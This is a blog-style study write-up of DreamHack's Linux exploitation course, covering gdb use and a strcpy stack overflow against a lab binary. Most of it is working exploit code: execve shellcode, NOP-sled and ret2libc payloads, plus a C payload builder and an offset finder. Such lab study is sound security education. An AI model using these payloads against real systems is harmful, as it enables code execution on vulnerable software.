DreamHack Linux Exploitation & Mitigation Part 1

-m32 compilation

Trial-and-error notes

Caution when setting breakpoints.

  • A breakpoint is inserted at the address where the code actually executes.
  • The addresses gdb shows while it only has the file loaded (before the first `run`) are file-relative offsets, not runtime addresses: the binary is position-independent (PIE), so main is listed at 0x64a before `run` and at 0x55555555464a after it, i.e. load base 0x555555554000 + 0x64a.
  • So run the program once (or use `starti`, which stops at the very first instruction) and take addresses from the mapped image; a symbolic breakpoint such as `b main` is relocated by gdb automatically. Otherwise you get:
    • Cannot insert breakpoint 1.
    • Cannot access memory at address 0x66f

gdb ./example0
set disassembly-flavor intel
show disassembly-flavor

  • break ,b
  • r, run
  • info break
  • info reg
  • print p
  • q
  • x/2wx x/s
  • c continue
  • nexti ni
// gcc -o example0 example0.c -m32
// (note: the gdb session below uses rbp/rsp, i.e. it is from a 64-bit build, so -m32 was not in effect for that run)
#include <stdio.h>

int main(void){
  int sum = 0;     // [rbp-0xc] in the listing below
  int val1 = 1;    // [rbp-0x8]
  int val2 = 2;    // [rbp-0x4]
  sum = val1 + val2;
  printf("1 + 2 = %d\n", sum);
  return 0;
}
gdb example0
GNU gdb (Ubuntu 8.1-0ubuntu3.2) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from example0...done.
(gdb) disas main
Dump of assembler code for function main:
   0x000000000000064a <+0>:	push   rbp
   0x000000000000064b <+1>:	mov    rbp,rsp
   0x000000000000064e <+4>:	sub    rsp,0x10
   0x0000000000000652 <+8>:	mov    DWORD PTR [rbp-0xc],0x0
   0x0000000000000659 <+15>:	mov    DWORD PTR [rbp-0x8],0x1
   0x0000000000000660 <+22>:	mov    DWORD PTR [rbp-0x4],0x2
   0x0000000000000667 <+29>:	mov    edx,DWORD PTR [rbp-0x8]
   0x000000000000066a <+32>:	mov    eax,DWORD PTR [rbp-0x4]
   0x000000000000066d <+35>:	add    eax,edx
   0x000000000000066f <+37>:	mov    DWORD PTR [rbp-0xc],eax
   0x0000000000000672 <+40>:	mov    eax,DWORD PTR [rbp-0xc]
   0x0000000000000675 <+43>:	mov    esi,eax
   0x0000000000000677 <+45>:	lea    rdi,[rip+0x96]        # 0x714
   0x000000000000067e <+52>:	mov    eax,0x0
   0x0000000000000683 <+57>:	call   0x520 <printf@plt>
   0x0000000000000688 <+62>:	mov    eax,0x0
   0x000000000000068d <+67>:	leave  
   0x000000000000068e <+68>:	ret    
End of assembler dump.
(gdb) b *0x000000000000066f
Breakpoint 1 at 0x66f: file example0.c, line 7.
(gdb) r
Starting program: /home/ubuntu/asm/example0 
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x66f

In this state the breakpoint cannot be inserted: 0x66f is the file offset of the instruction, and nothing is mapped at that address until the program has been started.

(gdb) disas main
Dump of assembler code for function main:
   0x000055555555464a <+0>:	push   rbp
   0x000055555555464b <+1>:	mov    rbp,rsp
   0x000055555555464e <+4>:	sub    rsp,0x10
   0x0000555555554652 <+8>:	mov    DWORD PTR [rbp-0xc],0x0
   0x0000555555554659 <+15>:	mov    DWORD PTR [rbp-0x8],0x1
   0x0000555555554660 <+22>:	mov    DWORD PTR [rbp-0x4],0x2
   0x0000555555554667 <+29>:	mov    edx,DWORD PTR [rbp-0x8]
   0x000055555555466a <+32>:	mov    eax,DWORD PTR [rbp-0x4]
   0x000055555555466d <+35>:	add    eax,edx
   0x000055555555466f <+37>:	mov    DWORD PTR [rbp-0xc],eax
   0x0000555555554672 <+40>:	mov    eax,DWORD PTR [rbp-0xc]
   0x0000555555554675 <+43>:	mov    esi,eax
   0x0000555555554677 <+45>:	lea    rdi,[rip+0x96]        # 0x555555554714
   0x000055555555467e <+52>:	mov    eax,0x0
   0x0000555555554683 <+57>:	call   0x555555554520 <printf@plt>
   0x0000555555554688 <+62>:	mov    eax,0x0
   0x000055555555468d <+67>:	leave  
   0x000055555555468e <+68>:	ret    
End of assembler dump.
x/2wx $esp
0xffffffffffffdec0:	Cannot access memory at address 0xffffffffffffdec0

This fails because example0 here is a 64-bit binary (rbp/rsp in the listing): $esp is only the low 32 bits of the stack pointer, and gdb sign-extends it into a bogus address. Use $rsp (or $sp) on a 64-bit target.
ps aux | grep read_write
$ pidof read_write
$ pgrep read_write
gdb -q -p 77422

Attaching must be done as root (or with kernel.yama.ptrace_scope set to 0): Ubuntu's default ptrace_scope=1 only lets an unprivileged user ptrace its own descendant processes, which is the "Operation not permitted" shown further below.

disas main on the read_write binary opened from disk (not yet attached): a 32-bit PIE, so again the addresses are file offsets.

   0x000005cd <+0>:	lea    ecx,[esp+0x4]
   0x000005d1 <+4>:	and    esp,0xfffffff0
   0x000005d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x000005d7 <+10>:	push   ebp
   0x000005d8 <+11>:	mov    ebp,esp
   0x000005da <+13>:	push   edi
   0x000005db <+14>:	push   ebx
   0x000005dc <+15>:	push   ecx
   0x000005dd <+16>:	sub    esp,0x5c
   0x000005e0 <+19>:	call   0x4d0 <__x86.get_pc_thunk.bx>
   0x000005e5 <+24>:	add    ebx,0x19eb
   0x000005eb <+30>:	mov    eax,gs:0x14
   0x000005f1 <+36>:	mov    DWORD PTR [ebp-0x1c],eax
   0x000005f4 <+39>:	xor    eax,eax
   0x000005f6 <+41>:	lea    edx,[ebp-0x5c]
   0x000005f9 <+44>:	mov    eax,0x0
   0x000005fe <+49>:	mov    ecx,0x10
  • info functions: print function names and addresses
  • disassemble main: print the disassembly of main
  • break <addr>: set a breakpoint at the address
  • info breakpoints: list breakpoints
  • run: run the program from the beginning
  • display <expr>: print the expression every time execution stops
  • continue: run until the next breakpoint
  • si: step instruction, execute a single instruction
  • finish: run until the current function returns
  • info registers: print the registers
  • x/: examine a memory region in the given unit and format
  • p: print, evaluate and print the expression
  • delete [break number]: delete the breakpoint with that number
  • quit: exit gdb

Process Attach

ubuntu@ubuntu-virtual-machine:~/asm$ gdb -q -p 4141
Attaching to process 4141
Could not attach to process.  If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user.  For more details, see /etc/sysctl.d/10-ptrace.conf
ptrace: Operation not permitted.
(gdb) q
ubuntu@ubuntu-virtual-machine:~/asm$ sudo gdb -q -p 4141
[sudo] password for ubuntu: 
Attaching to process 4141
Reading symbols from /home/ubuntu/asm/read_write...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7f85b59 in __kernel_vsyscall ()
(gdb) 
(gdb) disas main
Dump of assembler code for function main:
   0x566455cd <+0>:	lea    ecx,[esp+0x4]
   0x566455d1 <+4>:	and    esp,0xfffffff0
   0x566455d4 <+7>:	push   DWORD PTR [ecx-0x4]
   0x566455d7 <+10>:	push   ebp
   0x566455d8 <+11>:	mov    ebp,esp
   0x566455da <+13>:	push   edi
   0x566455db <+14>:	push   ebx
   0x566455dc <+15>:	push   ecx
   0x566455dd <+16>:	sub    esp,0x5c
   0x566455e0 <+19>:	call   0x566454d0 <__x86.get_pc_thunk.bx>
   0x566455e5 <+24>:	add    ebx,0x19eb
   0x566455eb <+30>:	mov    eax,gs:0x14
   0x566455f1 <+36>:	mov    DWORD PTR [ebp-0x1c],eax
   0x566455f4 <+39>:	xor    eax,eax
   0x566455f6 <+41>:	lea    edx,[ebp-0x5c]
   0x566455f9 <+44>:	mov    eax,0x0
   0x566455fe <+49>:	mov    ecx,0x10
   0x56645603 <+54>:	mov    edi,edx
   0x56645605 <+56>:	rep stos DWORD PTR es:[edi],eax
   0x56645607 <+58>:	sub    esp,0xc
   0x5664560a <+61>:	lea    eax,[ebx-0x18c0]
   0x56645610 <+67>:	push   eax
   0x56645611 <+68>:	call   0x56645440 <printf@plt>
   0x56645616 <+73>:	add    esp,0x10
   0x56645619 <+76>:	sub    esp,0x8
   0x5664561c <+79>:	lea    eax,[ebp-0x5c]
   0x5664561f <+82>:	push   eax
   0x56645620 <+83>:	lea    eax,[ebx-0x18b7]
   0x56645626 <+89>:	push   eax
   0x56645627 <+90>:	call   0x56645470 <__isoc99_scanf@plt>
   0x5664562c <+95>:	add    esp,0x10
   0x5664562f <+98>:	sub    esp,0x8
   0x56645632 <+101>:	lea    eax,[ebp-0x5c]
   0x56645635 <+104>:	push   eax
   0x56645636 <+105>:	lea    eax,[ebx-0x18b2]
   0x5664563c <+111>:	push   eax
   0x5664563d <+112>:	call   0x56645440 <printf@plt>
   0x56645642 <+117>:	add    esp,0x10
   0x56645645 <+120>:	mov    eax,0x0
   0x5664564a <+125>:	mov    edx,DWORD PTR [ebp-0x1c]
   0x5664564d <+128>:	xor    edx,DWORD PTR gs:0x14
   0x56645654 <+135>:	je     0x5664565b <main+142>
   0x56645656 <+137>:	call   0x566456e0 <__stack_chk_fail_local>
   0x5664565b <+142>:	lea    esp,[ebp-0xc]
---Type <return> to continue, or q <return> to quit---
   0x5664565e <+145>:	pop    ecx
   0x5664565f <+146>:	pop    ebx
   0x56645660 <+147>:	pop    edi
   0x56645661 <+148>:	pop    ebp
   0x56645662 <+149>:	lea    esp,[ecx-0x4]
   0x56645665 <+152>:	ret    
End of assembler dump.

(gdb) b *0x5664562c
Breakpoint 1 at 0x5664562c
(gdb) c
Continuing.

Breakpoint 1, 0x5664562c in main ()
(gdb) x/4wx $ebp-0x5c
0xff834c9c:	0x64636261	0x34333231	0x00000000	0x00000000

0x64636261 0x34333231 is the input "abcd1234" that scanf stored in the buffer at ebp-0x5c, shown as little-endian words (0x61 = 'a' is the lowest byte of the first word).

Return Address Overwrite

(gdb) disas vuln
   0x5655554d <+0>:	push   ebp
   0x5655554e <+1>:	mov    ebp,esp
   0x56555550 <+3>:	push   ebx
   0x56555551 <+4>:	sub    esp,0x20
   0x56555554 <+7>:	call   0x56555549 <__x86.get_pc_thunk.dx>
   0x56555559 <+12>:	add    edx,0x1a7b
   0x5655555f <+18>:	mov    ebx,0x0
   0x56555564 <+23>:	mov    eax,0x20
   0x56555569 <+28>:	and    eax,0xfffffffc
   0x5655556c <+31>:	mov    ecx,eax
   0x5655556e <+33>:	mov    eax,0x0
   0x56555573 <+38>:	mov    DWORD PTR [ebp+eax*1-0x24],ebx
   0x56555577 <+42>:	add    eax,0x4
   0x5655557a <+45>:	cmp    eax,ecx
   0x5655557c <+47>:	jb     0x56555573 <vuln+38>
   0x5655557e <+49>:	push   DWORD PTR [ebp+0x8]
   0x56555581 <+52>:	lea    eax,[ebp-0x24]
   0x56555584 <+55>:	push   eax
   0x56555585 <+56>:	mov    ebx,edx
   0x56555587 <+58>:	call   0x565553d0 <strcpy@plt>
   0x5655558c <+63>:	add    esp,0x8
   0x5655558f <+66>:	mov    eax,0x0
---Type <return> to continue, or q <return> to quit---
   0x56555594 <+71>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x56555597 <+74>:	leave  
   0x56555598 <+75>:	ret    

b *0x5655554d
r aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllll
x/2wx $esp

0xffffd07c:	0x565555c4	0xffffd30b
x/i 0x565555c4
x/s 0xffffd30b
  • 0xffffd07c : esp at the entry of vuln, i.e. the slot holding the return address
  • 0x565555c4 : return address into main (the `add esp,0x4` right after `call vuln`)
  • 0xffffd30b : argv[1], vuln's argument
b *0x56555587
c
x/2wx $esp

0xffffd04c:	0xffffd054	0xffffd30b
  • 0xffffd054 : address of buf (strcpy's destination)
  • 0xffffd30b : argv[1] (strcpy's source)
(gdb) ni
0x5655558c in vuln ()

(gdb) x/20wx 0xffffd054
0xffffd054:	0x61616161	0x62626262	0x63636363	0x64646464
0xffffd064:	0x65656565	0x66666666	0x67676767	0x68686868
0xffffd074:	0x69696969	0x6a6a6a6a	0x6b6b6b6b	0x6c6c6c6c
0xffffd084:	0x00000000	0x00000000	0xf7dfae81	0x00000002
0xffffd094:	0xffffd124	0xffffd130	0xffffd0b4	0x00000002

0xffffd07c:   0x6b6b6b6b

This differs from the lab! In the DreamHack lab the return-address slot held 0x6a6a6a6a ("jjjj").

The real layout here is buf[32] | saved ebx | saved ebp | return address: vuln pushes ebx at <+3> before `sub esp,0x20`, and buf is at ebp-0x24 (`lea eax,[ebp-0x24]`).

  • 0xffffd054 : buf, 32 bytes (0xffffd054 .. 0xffffd073)
  • 0xffffd074 : saved ebx (ebp-0x4, restored at <+71>)
  • 0xffffd078 : saved ebp
  • 0xffffd07c : return address

So 32 + 4 + 4 = 40 bytes of input come before the return address, 4 more than the lab's 36 (presumably that build did not save ebx between buf and the frame pointer).

(gdb) info reg
eax            0xffffd054	-12204
ecx            0xffffd330	-11472
edx            0xffffd079	-12167
ebx            0x56556fd4	1448439764
esp            0xffffd04c	0xffffd04c
ebp            0xffffd078	0xffffd078
esi            0xf7fb7000	-134516736
edi            0x0	0
eip            0x5655558c	0x5655558c <vuln+63>
eflags         0x202	[ IF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99



(gdb) b*0x56555598
Breakpoint 3 at 0x56555598
(gdb) c
Continuing.

Breakpoint 3, 0x56555598 in vuln ()

(gdb) x/wx $esp
0xffffd07c:	0x6b6b6b6b

End of the test: at vuln's `ret`, esp points at 0xffffd07c and that slot holds 0x6b6b6b6b ("kkkk"), so bytes 41..44 of argv[1] become the address `ret` jumps to.
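The probe used above (run with aaaabbbbcccc..., then read the dword at $esp on `ret`) is the manual version of what pattern tools do. As an added example that is not from the post or from DreamHack, here is the same procedure in C: make_pattern() builds the probe string, pattern_offset() maps the dword gdb printed back to the byte offset of the return address from buf[0] (including the case where the hit is not 4-aligned), and ret_offset_from_frame() cross-checks the answer from the disassembly's ebp-0x24. The values 0x6b6b6b6b and 0x6a6a6a6a are taken from the session above; the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Build the probe string passed to `r`: every letter repeated 4 times
 * ("aaaabbbbcccc..."), `words` groups long. Returns the length written.
 * The letters wrap after 26 groups, so keep probes shorter than 104 bytes
 * if the result must be unambiguous. */
static size_t make_pattern(char *out, size_t cap, int words)
{
    size_t n = 0;
    for (int i = 0; i < words && n + 4 < cap; i++) {
        memset(out + n, 'a' + (i % 26), 4);
        n += 4;
    }
    out[n] = '\0';
    return n;
}

/* `seen` is the dword gdb printed for the return slot (x/wx $esp at `ret`).
 * x86 stores it little-endian, so its low byte is the first pattern byte that
 * landed there. Return that byte's index in the pattern, i.e. the offset from
 * buf[0] to the return address, or -1 if the value is not from the pattern. */
static long pattern_offset(const char *pat, size_t n, uint32_t seen)
{
    unsigned char needle[4] = {
        seen & 0xff, (seen >> 8) & 0xff, (seen >> 16) & 0xff, (seen >> 24) & 0xff
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Convenience wrapper: build a `words`-group pattern and look `seen` up in it. */
static long find_offset(int words, uint32_t seen)
{
    char pat[256];
    size_t n = make_pattern(pat, sizeof pat, words);
    return pattern_offset(pat, n, seen);
}

/* The same answer read off the disassembly of vuln(): buf lives at
 * ebp-0x24 and the return address at ebp+4, so disp + 4 bytes reach it. */
static long ret_offset_from_frame(unsigned buf_disp_from_ebp)
{
    return (long)buf_disp_from_ebp + 4;
}

int main(void)
{
    char pat[256];
    make_pattern(pat, sizeof pat, 12);          /* 48 bytes, as in the notes */
    printf("probe string: %s\n", pat);
    /* 0x6b6b6b6b is what x/wx $esp showed at vuln's ret in the session above;
     * 0x6a6a6a6a is what the DreamHack lab build showed. */
    printf("0x6b6b6b6b at ret -> return address at offset %ld\n",
           find_offset(12, 0x6b6b6b6b));
    printf("0x6a6a6a6a at ret -> offset %ld (the lab's build)\n",
           find_offset(12, 0x6a6a6a6a));
    printf("from the frame layout (buf at ebp-0x24): %ld\n",
           ret_offset_from_frame(0x24));
    return 0;
}
```

Run it, paste the printed probe into `r`, break on vuln's `ret`, and feed the dword from `x/wx $esp` to find_offset(); both methods give 40 for this binary, which is why the exploits below use 40 bytes of padding (shellcode plus "A"s, or "A"*40).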

Exploit: put the 23-byte execve("/bin//sh") shellcode at the start of buf, pad with "A" up to the 40-byte return-address offset, and overwrite the return address with the stack address where the shellcode sits, 0xffffd004 in this run, written little-endian as "\x04\xd0\xff\xff":
(gdb) r `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"+"A"*17+"\x04\xd0\xff\xff"'`
Starting program: /home/ubuntu/dreamhack/example1 `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"+"A"*17+"\x04\xd0\xff\xff"'`
process 6746 is executing new program: /bin/dash
$ is
sh: 1: is: not found
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),127(kvm)


NOP Sled

NOP = No OPeration, opcode 0x90 on x86. A long run of 0x90 in front of the shellcode means the return address only has to land somewhere inside the sled rather than exactly on the first shellcode byte: the CPU executes the NOPs one after another and slides into the shellcode. Here the sled and the shellcode are placed after the return address (argv[1] itself lives on the stack, see 0xffffd30b above), and 0xffff0f7a points somewhere into the sled:

./example1  `python -c 'print  "A"*40 + "\x7a\x0f\xff\xff" + "\x90"*100000 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"'`


Enter the NX bit

With NX (non-executable stack) enabled the stack pages cannot be executed, so returning into shellcode on the stack no longer works. Instead, return into code that is already executable: libc's system(), with a "/bin/sh" string that libc itself contains (ret2libc). The addresses below are read in gdb (`p system`, `find` over the libc mapping from `info proc map`); note the disassembly flavor is back to AT&T in this session.

(gdb) disas main
Dump of assembler code for function main:
=> 0x56555599 <+0>:	push   %ebp
   0x5655559a <+1>:	mov    %esp,%ebp
   0x5655559c <+3>:	push   %ebx
   0x5655559d <+4>:	call   0x565555d1 <__x86.get_pc_thunk.ax>
   0x565555a2 <+9>:	add    $0x1a32,%eax
   0x565555a7 <+14>:	cmpl   $0x1,0x8(%ebp)
   0x565555ab <+18>:	jg     0x565555b6 <main+29>
   0x565555ad <+20>:	push   $0xffffffff
   0x565555af <+22>:	mov    %eax,%ebx
   0x565555b1 <+24>:	call   0x565553e0 <exit@plt>
   0x565555b6 <+29>:	mov    0xc(%ebp),%eax
   0x565555b9 <+32>:	add    $0x4,%eax
   0x565555bc <+35>:	mov    (%eax),%eax
   0x565555be <+37>:	push   %eax
   0x565555bf <+38>:	call   0x5655554d <vuln>
   0x565555c4 <+43>:	add    $0x4,%esp
   0x565555c7 <+46>:	mov    $0x0,%eax
   0x565555cc <+51>:	mov    -0x4(%ebp),%ebx
   0x565555cf <+54>:	leave  
   0x565555d0 <+55>:	ret    
End of assembler dump.
(gdb) info proc map
process 3449
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	0x56555000 0x56556000     0x1000        0x0 /home/ubuntu/dreamhack/example1
	0x56556000 0x56557000     0x1000        0x0 /home/ubuntu/dreamhack/example1
	0x56557000 0x56558000     0x1000     0x1000 /home/ubuntu/dreamhack/example1
	0xf7ddd000 0xf7fb2000   0x1d5000        0x0 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb2000 0xf7fb3000     0x1000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb3000 0xf7fb5000     0x2000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb5000 0xf7fb6000     0x1000   0x1d7000 /lib/i386-linux-gnu/libc-2.27.so
	0xf7fb6000 0xf7fb9000     0x3000        0x0 
	0xf7fd0000 0xf7fd2000     0x2000        0x0 
	0xf7fd2000 0xf7fd5000     0x3000        0x0 [vvar]
	0xf7fd5000 0xf7fd6000     0x1000        0x0 [vdso]
---Type <return> to continue, or q <return> to quit---
	0xf7fd6000 0xf7ffc000    0x26000        0x0 /lib/i386-linux-gnu/ld-2.27.so
	0xf7ffc000 0xf7ffd000     0x1000    0x25000 /lib/i386-linux-gnu/ld-2.27.so
	0xf7ffd000 0xf7ffe000     0x1000    0x26000 /lib/i386-linux-gnu/ld-2.27.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e1a250 <system>
(gdb) find 0xf7ddd000, 0xf7fb2000, "/bin/sh"
0xf7f5b3cf
1 pattern found.

Exploit code

Layout: 40 bytes of padding to reach the return address, then the address of system() (0xf7e1a250, little-endian "\x50\xa2\xe1\xf7"), then 4 bytes ("BBBB") that become the return address of system() itself (never reached once the shell is running), then the address of "/bin/sh" inside libc (0xf7f5b3cf) as system()'s first argument:

`python -c 'print "A"*40 + "\x50\xa2\xe1\xf7" + "BBBB" +  "\xcf\xb3\xf5\xf7"'`


If this ends in a Segmentation fault, ASLR is the most likely cause: gdb disables address-space randomization by default, so libc addresses read inside gdb do not match a process started from the shell. Check /proc/sys/kernel/randomize_va_space and set it to 0 (as root) before retrying.
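The three payloads on this page (shellcode in buf, NOP sled, ret2libc) are built with python one-liners above. As an added example, not part of the original post or of DreamHack's material, here is a small C payload builder that assembles the same byte strings and checks the property every strcpy()-based overflow depends on: the payload must contain no 0x00 byte, because strcpy stops copying there and the return address is never reached. RET_OFFSET, the shellcode and the addresses (0xffffd004, 0xffff0f7a, 0xf7e1a250, 0xf7f5b3cf) are copied from the notes; the function and type names are mine, and the addresses only hold for the author's machine with ASLR off.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RET_OFFSET 40   /* buf[32] + saved ebx + saved ebp, measured above */

/* 23-byte execve("/bin//sh") shellcode from the notes' python one-liners. */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)
_Static_assert(SHELLCODE_LEN <= RET_OFFSET, "shellcode does not fit before the return slot");

struct payload { unsigned char *buf; size_t len, cap; };

static struct payload payload_new(size_t cap)
{
    struct payload p = { malloc(cap), 0, cap };
    if (!p.buf) { perror("malloc"); exit(1); }
    return p;
}

static void put_bytes(struct payload *p, const void *src, size_t n)
{
    if (p->len + n > p->cap) { fprintf(stderr, "payload too long\n"); exit(1); }
    memcpy(p->buf + p->len, src, n);
    p->len += n;
}

static void put_fill(struct payload *p, unsigned char c, size_t n)
{
    while (n--) put_bytes(p, &c, 1);
}

/* 32-bit little-endian: 0xffffd004 becomes "\x04\xd0\xff\xff". */
static void put_le32(struct payload *p, uint32_t v)
{
    unsigned char b[4] = { v & 0xff, (v >> 8) & 0xff, (v >> 16) & 0xff, (v >> 24) & 0xff };
    put_bytes(p, b, 4);
}

/* Read a little-endian dword back out, to check what lands in a given slot. */
static uint32_t le32_at(struct payload p, size_t off)
{
    const unsigned char *b = p.buf + off;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

static unsigned byte_at(struct payload p, size_t off) { return p.buf[off]; }

/* 1. Shellcode inside buf: code first, pad to the return slot, return to buf. */
static struct payload shellcode_in_buf(uint32_t buf_addr)
{
    struct payload p = payload_new(RET_OFFSET + 4);
    put_bytes(&p, shellcode, SHELLCODE_LEN);
    put_fill(&p, 'A', RET_OFFSET - SHELLCODE_LEN);
    put_le32(&p, buf_addr);
    return p;
}

/* 2. NOP sled: pad to the return slot, return into the run of 0x90 that
 * follows (argv[1] is on the stack too), and slide into the shellcode. */
static struct payload nop_sled(uint32_t sled_addr, size_t nops)
{
    struct payload p = payload_new(RET_OFFSET + 4 + nops + SHELLCODE_LEN);
    put_fill(&p, 'A', RET_OFFSET);
    put_le32(&p, sled_addr);
    put_fill(&p, 0x90, nops);
    put_bytes(&p, shellcode, SHELLCODE_LEN);
    return p;
}

/* 3. ret2libc for an NX stack: return into system(); the next dword is the
 * return address system() itself would use ("BBBB"), then its argument,
 * the "/bin/sh" string that libc already contains. */
static struct payload ret2libc(uint32_t system_addr, uint32_t binsh_addr)
{
    struct payload p = payload_new(RET_OFFSET + 12);
    put_fill(&p, 'A', RET_OFFSET);
    put_le32(&p, system_addr);
    put_bytes(&p, "BBBB", 4);
    put_le32(&p, binsh_addr);
    return p;
}

/* strcpy() stops at the first 0x00, so a NUL anywhere in the payload cuts
 * the copy short; an address such as 0x0804a000 could never be delivered. */
static int strcpy_safe(struct payload p)
{
    return memchr(p.buf, 0, p.len) == NULL;
}

int main(int argc, char **argv)
{
    /* Addresses are the ones gdb printed in the notes (ASLR disabled) and
     * must be re-read on another machine or after any change to argv/env. */
    const char *which = argc > 1 ? argv[1] : "shellcode";
    struct payload p;
    if (strcmp(which, "ret2libc") == 0) p = ret2libc(0xf7e1a250, 0xf7f5b3cf);
    else if (strcmp(which, "nop") == 0) p = nop_sled(0xffff0f7a, 100000);
    else                                p = shellcode_in_buf(0xffffd004);

    if (!strcpy_safe(p)) {
        fprintf(stderr, "payload contains a NUL byte; strcpy() would truncate it\n");
        return 1;
    }
    fwrite(p.buf, 1, p.len, stdout);   /* ./example1 "$(./payload ret2libc)" */
    free(p.buf);
    return 0;
}
```

Usage: `./example1 "$(./payload)"`, `"$(./payload nop)"` or `"$(./payload ret2libc)"` in place of the python one-liners. The NUL check is the reason the payloads above only work with addresses whose four bytes are all non-zero; the little-endian helper is what turns 0xf7e1a250 into the "\x50\xa2\xe1\xf7" written by hand in the exploit line.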

Posted 2020-08-22